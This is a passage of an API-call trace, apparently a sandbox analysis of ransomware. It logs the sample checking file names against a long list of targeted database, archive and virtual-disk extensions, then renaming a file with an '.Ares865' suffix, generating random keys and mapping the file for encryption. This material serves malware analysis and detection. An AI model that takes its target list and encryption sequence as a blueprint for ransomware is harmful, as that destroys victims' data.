lpString2="PUB6INTL.REST.trx_dll" | out: lpString1="PUB6INTL.REST.trx_dll") returned="PUB6INTL.REST.trx_dll" [0086.715] lstrlenW (lpString="PUB6INTL.REST.trx_dll") returned 21 [0086.715] lstrlenW (lpString="Ares865") returned 7 [0086.715] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.715] lstrlenW (lpString=".dll") returned 4 [0086.715] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".dll") returned 1 [0086.715] lstrlenW (lpString=".lnk") returned 4 [0086.715] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".lnk") returned 1 [0086.715] lstrlenW (lpString=".ini") returned 4 [0086.715] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".ini") returned 1 [0086.715] lstrlenW (lpString=".sys") returned 4 [0086.715] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".sys") returned 1 [0086.715] lstrlenW (lpString="PUB6INTL.REST.trx_dll") returned 21 [0086.715] lstrlenW (lpString="bak") returned 3 [0086.715] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.715] lstrlenW (lpString="ba_") returned 3 [0086.715] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.715] lstrlenW (lpString="dbb") returned 3 [0086.715] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.715] lstrlenW (lpString="vmdk") returned 4 [0086.715] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.715] lstrlenW (lpString="rar") returned 3 [0086.715] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.715] lstrlenW (lpString="zip") returned 3 [0086.715] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.715] lstrlenW (lpString="tgz") returned 3 [0086.715] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.715] lstrlenW (lpString="vbox") returned 4 [0086.715] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.715] lstrlenW (lpString="vdi") returned 3 [0086.715] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.715] lstrlenW (lpString="vhd") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.716] lstrlenW (lpString="vhdx") returned 4 [0086.716] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.716] lstrlenW (lpString="avhd") returned 4 [0086.716] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.716] lstrlenW (lpString="db") returned 2 [0086.716] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.716] lstrlenW (lpString="db2") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.716] lstrlenW (lpString="db3") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.716] lstrlenW (lpString="dbf") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.716] lstrlenW (lpString="mdf") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.716] lstrlenW (lpString="mdb") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.716] lstrlenW (lpString="sql") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.716] lstrlenW (lpString="sqlite") returned 6 [0086.716] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.716] lstrlenW (lpString="sqlite3") returned 7 [0086.716] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.716] lstrlenW (lpString="sqlitedb") returned 8 [0086.716] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.716] lstrlenW (lpString="xml") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.716] lstrlenW (lpString="$er") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.716] lstrlenW (lpString="4dd") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.716] lstrlenW (lpString="4dl") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.716] lstrlenW (lpString="^^^") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.716] lstrlenW (lpString="abs") returned 3 [0086.716] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.717] lstrlenW (lpString="abx") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.717] lstrlenW (lpString="accdb") returned 5 [0086.717] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.717] lstrlenW (lpString="accdc") returned 5 [0086.717] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.717] lstrlenW (lpString="accde") returned 5 [0086.717] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.717] lstrlenW (lpString="accdr") returned 5 [0086.717] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.717] lstrlenW (lpString="accdt") returned 5 [0086.717] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.717] lstrlenW (lpString="accdw") returned 5 [0086.717] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.717] lstrlenW (lpString="accft") returned 5 [0086.717] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.717] lstrlenW (lpString="adb") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.717] lstrlenW (lpString="adb") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.717] lstrlenW (lpString="ade") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.717] lstrlenW (lpString="adf") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.717] lstrlenW (lpString="adn") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.717] lstrlenW (lpString="adp") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.717] lstrlenW (lpString="alf") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.717] lstrlenW (lpString="ask") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.717] lstrlenW (lpString="btr") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.717] lstrlenW (lpString="cat") returned 3 [0086.717] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.717] lstrlenW (lpString="cdb") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.718] lstrlenW (lpString="ckp") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.718] lstrlenW (lpString="cma") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.718] lstrlenW (lpString="cpd") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.718] lstrlenW (lpString="dacpac") returned 6 [0086.718] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.718] lstrlenW (lpString="dad") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.718] lstrlenW (lpString="dadiagrams") returned 10 [0086.718] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0086.718] lstrlenW (lpString="daschema") returned 8 [0086.718] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.718] lstrlenW (lpString="db-journal") returned 10 [0086.718] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0086.718] lstrlenW (lpString="db-shm") returned 6 [0086.718] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.718] lstrlenW (lpString="db-wal") returned 6 [0086.718] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.718] lstrlenW (lpString="dbc") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.718] lstrlenW (lpString="dbs") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.718] lstrlenW (lpString="dbt") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.718] lstrlenW (lpString="dbv") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.718] lstrlenW (lpString="dbx") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.718] lstrlenW (lpString="dcb") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.718] lstrlenW (lpString="dct") returned 3 [0086.718] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.718] lstrlenW (lpString="dcx") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.719] lstrlenW (lpString="ddl") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.719] lstrlenW (lpString="dlis") returned 4 [0086.719] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.719] lstrlenW (lpString="dp1") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.719] lstrlenW (lpString="dqy") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.719] lstrlenW (lpString="dsk") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.719] lstrlenW (lpString="dsn") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.719] lstrlenW (lpString="dtsx") returned 4 [0086.719] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.719] lstrlenW (lpString="dxl") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.719] lstrlenW (lpString="eco") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.719] lstrlenW (lpString="ecx") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.719] lstrlenW (lpString="edb") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.719] lstrlenW (lpString="epim") returned 4 [0086.719] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.719] lstrlenW (lpString="fcd") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.719] lstrlenW (lpString="fdb") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.719] lstrlenW (lpString="fic") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.719] lstrlenW (lpString="flexolibrary") returned 12 [0086.719] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0086.719] lstrlenW (lpString="fm5") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.719] lstrlenW (lpString="fmp") returned 3 [0086.719] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.720] lstrlenW (lpString="fmp12") returned 5 [0086.720] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.720] lstrlenW (lpString="fmpsl") returned 5 [0086.720] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.720] lstrlenW (lpString="fol") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.720] lstrlenW (lpString="fp3") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.720] lstrlenW (lpString="fp4") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.720] lstrlenW (lpString="fp5") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.720] lstrlenW (lpString="fp7") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.720] lstrlenW (lpString="fpt") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.720] lstrlenW (lpString="frm") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.720] lstrlenW (lpString="gdb") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.720] lstrlenW (lpString="gdb") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.720] lstrlenW (lpString="grdb") returned 4 [0086.720] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.720] lstrlenW (lpString="gwi") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.720] lstrlenW (lpString="hdb") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.720] lstrlenW (lpString="his") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.720] lstrlenW (lpString="ib") returned 2 [0086.720] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.720] lstrlenW (lpString="idb") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.720] lstrlenW (lpString="ihx") returned 3 [0086.720] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.720] lstrlenW (lpString="itdb") returned 4 [0086.721] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.721] lstrlenW (lpString="itw") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.721] lstrlenW (lpString="jet") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.721] lstrlenW (lpString="jtx") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.721] lstrlenW (lpString="kdb") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.721] lstrlenW (lpString="kexi") returned 4 [0086.721] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.721] lstrlenW (lpString="kexic") returned 5 [0086.721] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.721] lstrlenW (lpString="kexis") returned 5 [0086.721] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.721] lstrlenW (lpString="lgc") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.721] lstrlenW (lpString="lwx") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.721] lstrlenW (lpString="maf") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.721] lstrlenW (lpString="maq") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.721] lstrlenW (lpString="mar") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.721] lstrlenW (lpString="marshal") returned 7 [0086.721] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.721] lstrlenW (lpString="mas") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.721] lstrlenW (lpString="mav") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.721] lstrlenW (lpString="maw") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.721] lstrlenW (lpString="mdbhtml") returned 7 [0086.721] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.721] lstrlenW (lpString="mdn") returned 3 [0086.721] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.722] lstrlenW (lpString="mdt") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.722] lstrlenW (lpString="mfd") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.722] lstrlenW (lpString="mpd") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.722] lstrlenW (lpString="mrg") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.722] lstrlenW (lpString="mud") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.722] lstrlenW (lpString="mwb") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.722] lstrlenW (lpString="myd") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.722] lstrlenW (lpString="ndf") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.722] lstrlenW (lpString="nnt") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.722] lstrlenW (lpString="nrmlib") returned 6 [0086.722] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.722] lstrlenW (lpString="ns2") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.722] lstrlenW (lpString="ns3") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.722] lstrlenW (lpString="ns4") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.722] lstrlenW (lpString="nsf") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.722] lstrlenW (lpString="nv") returned 2 [0086.722] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.722] lstrlenW (lpString="nv2") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.722] lstrlenW (lpString="nwdb") returned 4 [0086.722] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.722] lstrlenW (lpString="nyf") returned 3 [0086.722] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.723] lstrlenW (lpString="odb") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.723] lstrlenW (lpString="odb") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.723] lstrlenW (lpString="oqy") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.723] lstrlenW (lpString="ora") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.723] lstrlenW (lpString="orx") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.723] lstrlenW (lpString="owc") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.723] lstrlenW (lpString="p96") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.723] lstrlenW (lpString="p97") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.723] lstrlenW (lpString="pan") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.723] lstrlenW (lpString="pdb") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.723] lstrlenW (lpString="pdm") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.723] lstrlenW (lpString="pnz") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.723] lstrlenW (lpString="qry") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.723] lstrlenW (lpString="qvd") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.723] lstrlenW (lpString="rbf") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.723] lstrlenW (lpString="rctd") returned 4 [0086.723] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.723] lstrlenW (lpString="rod") returned 3 [0086.723] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.723] lstrlenW (lpString="rodx") returned 4 [0086.723] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.723] lstrlenW (lpString="rpd") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.724] lstrlenW (lpString="rsd") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.724] lstrlenW (lpString="sas7bdat") returned 8 [0086.724] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.724] lstrlenW (lpString="sbf") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.724] lstrlenW (lpString="scx") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.724] lstrlenW (lpString="sdb") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.724] lstrlenW (lpString="sdc") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.724] lstrlenW (lpString="sdf") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.724] lstrlenW (lpString="sis") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.724] lstrlenW (lpString="spq") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.724] lstrlenW (lpString="te") returned 2 [0086.724] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.724] lstrlenW (lpString="teacher") returned 7 [0086.724] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.724] lstrlenW (lpString="tmd") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.724] lstrlenW (lpString="tps") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.724] lstrlenW (lpString="trc") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.724] lstrlenW (lpString="trc") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.724] lstrlenW (lpString="trm") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.724] lstrlenW (lpString="udb") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.724] lstrlenW (lpString="udl") returned 3 [0086.724] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.725] lstrlenW (lpString="usr") returned 3 [0086.725] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.725] lstrlenW (lpString="v12") returned 3 [0086.725] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.725] lstrlenW (lpString="vis") returned 3 [0086.725] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.725] lstrlenW (lpString="vpd") returned 3 [0086.725] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.725] lstrlenW (lpString="vvv") returned 3 [0086.725] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.725] lstrlenW (lpString="wdb") returned 3 [0086.725] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.725] lstrlenW (lpString="wmdb") returned 4 [0086.725] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.725] lstrlenW (lpString="wrk") returned 3 [0086.725] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.725] lstrlenW (lpString="xdb") returned 3 [0086.725] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.725] lstrlenW (lpString="xld") returned 3 [0086.725] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.725] lstrlenW (lpString="xmlff") returned 5 [0086.725] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.725] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.Ares865") returned 81 [0086.725] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.727] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.727] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=556896) returned 1 [0086.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.727] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.728] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.728] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.729] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x88260, lpName=0x0) returned 0x15c [0086.730] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x88260) returned 0x420000 [0086.758] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.759] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.759] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0086.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0086.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.759] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0086.764] CloseHandle (hObject=0x15c) returned 1 [0086.764] CloseHandle (hObject=0x118) returned 1 [0086.765] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.765] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.765] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.767] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2720b500, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2720b500, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x57f60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUBWZINT.REST.trx_dll", 